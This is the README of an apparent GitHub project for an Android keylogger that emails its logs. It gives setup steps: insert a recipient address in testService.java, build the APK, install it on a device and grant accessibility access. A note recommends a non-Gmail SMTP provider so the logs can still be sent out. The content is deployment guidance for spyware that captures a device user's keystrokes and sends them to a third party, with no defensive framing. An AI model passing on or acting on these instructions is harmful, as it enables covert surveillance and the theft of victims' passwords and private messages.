RahulPalve/Android-keylogger-with-email/README.md

 - add the mail address where logs must be sent to`testService.java` (just replace 'XXXXX' with maril).
 - Build APK, use Android Studio or whatever you like.
 - Install app and grant accessibilty access.

+Note : Gmail stopped it's SMTP service which uses just username and password.
+It is suggested to use other SMTP service instead ex.
+Yahoo etc